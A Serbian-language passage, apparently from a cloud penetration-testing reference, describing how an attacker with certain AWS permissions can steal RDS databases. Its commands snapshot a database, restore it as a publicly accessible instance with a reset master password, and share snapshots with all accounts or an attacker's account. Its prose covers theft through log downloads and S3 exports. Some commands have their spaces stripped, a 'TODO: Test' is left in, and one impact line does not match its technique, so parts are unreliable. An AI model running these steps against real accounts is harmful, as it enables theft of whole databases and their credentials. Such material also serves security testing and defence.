Ako napadač ima dovoljno dozvola, može učiniti Bazu podataka javno dostupnom tako što će napraviti snimak baze podataka, a zatim javno dostupnu bazu podataka iz tog snimka.
awsrdsdescribe-db-instances# Get DB identifierawsrdscreate-db-snapshot \--db-instance-identifier <db-id> \--db-snapshot-identifier cloudgoat# Get subnet groups & security groupsawsrdsdescribe-db-subnet-groupsawsec2describe-security-groupsawsrdsrestore-db-instance-from-db-snapshot \--db-instance-identifier "new-db-not-malicious" \--db-snapshot-identifier <scapshotId> \--db-subnet-group-name <dbsubnetgroup> \--publicly-accessible \--vpc-security-group-ids <ec2-securitygroup>awsrdsmodify-db-instance \--db-instance-identifier "new-db-not-malicious" \--master-user-password 'Llaody2f6.123' \--apply-immediately# Connect to the new DB after a few mins
Napadač sa ovim dozvolama može napraviti snimak baze podataka i učiniti ga javno dostupnim. Zatim, može jednostavno kreirati u svom nalogu bazu podataka iz tog snimka.
Ako napadač nema dozvolu rds:CreateDBSnapshot, ipak može učiniti druge kreirane snimke javno dostupnim.
# create snapshotawsrdscreate-db-snapshot--db-instance-identifier<db-instance-identifier>--db-snapshot-identifier<snapshot-name># Make it public/share with attackers accountaws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
rds:DownloadDBLogFilePortion
Napadač sa dozvolom rds:DownloadDBLogFilePortion može preuzeti delove log fajlova RDS instance-a. Ako osetljivi podaci ili pristupni podaci slučajno budu zabeleženi, napadač bi potencijalno mogao koristiti ove informacije za eskalaciju privilegija ili izvođenje neovlašćenih radnji.
Potencijalni uticaj: Brisanje postojećih RDS instanci i potencijalni gubitak podataka.
rds:StartExportTask
TODO: Test
Napadač sa ovlašćenjem može pokrenuti izvoz snimka RDS instance u S3 bucket. Ako napadač ima kontrolu nad odredišnim S3 bucket-om, potencijalno može pristupiti osetljivim podacima unutar izvezenog snimka.